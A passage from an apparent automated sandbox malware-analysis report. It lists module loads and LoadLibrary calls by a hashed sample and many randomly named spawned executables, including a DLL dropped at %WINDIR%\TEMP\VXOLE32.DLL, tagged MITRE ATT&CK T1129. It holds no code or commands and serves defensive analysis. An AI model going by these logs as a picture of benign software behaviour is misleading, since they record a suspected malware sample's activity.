\"MSVCRT.DLL\" at base 77900000\n \"464448.exe\" loaded module \"SHLWAPI.DLL\" at base 77e80000\n \"464448.exe\" loaded module \"USER32.DLL\" at base 779b0000\n \"464448.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"jlrnp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"jlrnp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jlrnp.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"jlrnp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jlrnp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"4682600.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"686200.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"686200.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"686200.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"686200.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"686200.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"026288.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"026288.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"026288.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"026288.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"026288.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"2420222.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"6088244.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"6088244.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6088244.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"6088244.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"826268.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"826268.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"826268.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"826268.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"826268.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"phdjp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"phdjp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"phdjp.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"phdjp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"phdjp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"dtlrb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"dtlrb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dtlrb.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"dtlrb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dtlrb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"dtlrb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"jrfndd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"jrfndd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jrfndd.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"jrfndd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jrfndd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"nvphdb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"nvphdb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nvphdb.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"nvphdb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nvphdb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"djlfb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"djlfb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"djlfb.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"djlfb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"djlfb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"djlfb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"46420.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"46420.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"46420.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"46420.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"46420.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"208666.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"208666.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"208666.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"208666.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"208666.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"08684.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"08684.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"08684.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"08684.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"08684.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"flrpd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"flrpd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"flrpd.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"flrpd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"flrpd.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"pjjvtd.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"pjjvtd.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pjjvtd.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"pjjvtd.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pjjvtd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"pdhfl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"tlxll.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"tlxll.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"tlxll.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"tlxll.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"tlxll.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"rflrbrt.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"fxrlrh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"fxrlrh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fxrlrh.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"fxrlrh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fxrlrh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"nrjljrp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"nrjljrp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nrjljrp.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"nrjljrp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nrjljrp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"44266.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"44266.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"44266.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"44266.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"44266.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"8682642.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"8682642.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"8682642.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"8682642.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"8682642.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"2246640.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"2246640.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2246640.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"2246640.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2246640.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"064826.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"064826.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"064826.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"064826.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"064826.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"nffhjx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"nffhjx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nffhjx.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"nffhjx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nffhjx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"jpflb.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 75ae0000\n \"xbnxx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"xbnxx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xbnxx.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"xbnxx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xbnxx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"24642.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"24642.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"24642.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"24642.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22840.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"22840.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"22840.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"22840.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"22840.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"866846.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"866846.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"866846.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"866846.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"866846.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000\n \"068420.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 71b10000\n \"068420.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"068420.exe\" loaded module \"KERNEL32\" at base 76ae0000\n \"068420.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"068420.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6c850000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004116)\n \"3d8af879bbbde5e9f5598715c576bf33fadeeae034114384893df9c534f86084.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004116)\n \"hnvpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006032)\n \"hnvpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006032)\n \"hnvpxj.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006032)\n \"hnvpxj.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006032)\n \"lbjvvjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006128)\n \"lbjvvjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006128)\n \"lbjvvjh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006128)\n \"lbjvvjh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006128)\n \"pdvxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006080)\n \"pdvxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006080)\n \"pdvxbf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006080)\n \"pdvxbf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006080)\n \"frdfrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006060)\n \"frdfrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006060)\n \"frdfrrr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006060)\n \"frdfrrr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006060)\n \"464448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003568)\n \"464448.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003568)\n \"jlrnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005996)\n \"jlrnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005996)\n \"jlrnp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005996)\n \"jlrnp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005996)\n \"686200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002528)\n \"686200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002528)\n \"686200.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002528)\n \"686200.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002528)\n \"026288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001416)\n \"026288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001416)\n \"026288.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001416)\n \"026288.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001416)\n \"6088244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001696)\n \"6088244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001696)\n \"6088244.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001696)\n \"6088244.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001696)\n \"826268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002648)\n \"826268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002648)\n \"826268.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002648)\n \"826268.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002648)\n \"phdjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004040)\n \"phdjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004040)\n \"phdjp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004040)\n \"phdjp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004040)\n \"dtlrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004496)\n \"dtlrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004496)\n \"dtlrb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004496)\n \"dtlrb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004496)\n \"jrfndd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002136)\n \"jrfndd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002136)\n \"jrfndd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002136)\n \"jrfndd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002136)\n \"nvphdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003900)\n \"nvphdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003900)\n \"nvphdb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003900)\n \"nvphdb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003900)\n \"djlfb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004132)\n \"djlfb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004132)\n \"djlfb.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004132)\n \"djlfb.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004132)\n \"46420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003908)\n \"46420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003908)\n \"46420.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003908)\n \"46420.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003908)\n \"208666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003768)\n \"208666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003768)\n \"208666.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003768)\n \"208666.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003768)\n \"08684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00002596)\n \"08684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00002596)\n \"08684.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00002596)\n \"08684.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00002596)\n \"flrpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004292)\n \"flrpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004292)\n \"flrpd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004292)\n \"flrpd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004292)\n \"pjjvtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001500)\n \"pjjvtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001500)\n \"pjjvtd.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001500)\n \"pjjvtd.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001500)\n \"tlxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003452)\n \"tlxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003452)\n \"tlxll.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003452)\n \"tlxll.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003452)\n \"fxrlrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003180)\n \"fxrlrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003180)\n \"fxrlrh.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003180)\n \"fxrlrh.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003180)\n \"nrjljrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003460)\n \"nrjljrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003460)\n \"nrjljrp.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003460)\n \"nrjljrp.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003460)\n \"44266.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003720)\n \"44266.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003720)\n \"44266.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003720)\n \"44266.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003720)\n \"8682642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001772)\n \"8682642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001772)\n \"8682642.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001772)\n \"8682642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001772)\n \"2246640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00001076)\n \"2246640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00001076)\n \"2246640.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00001076)\n \"2246640.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00001076)\n \"064826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00000596)\n \"064826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00000596)\n \"064826.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00000596)\n \"064826.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00000596)\n \"nffhjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003200)\n \"nffhjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003200)\n \"nffhjx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003200)\n \"nffhjx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003200)\n \"xbnxx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003012)\n \"xbnxx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003012)\n \"xbnxx.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003012)\n \"xbnxx.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003012)\n \"24642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003828)\n \"24642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003828)\n \"24642.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003828)\n \"24642.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003828)\n \"22840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004588)\n \"22840.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004588)\n 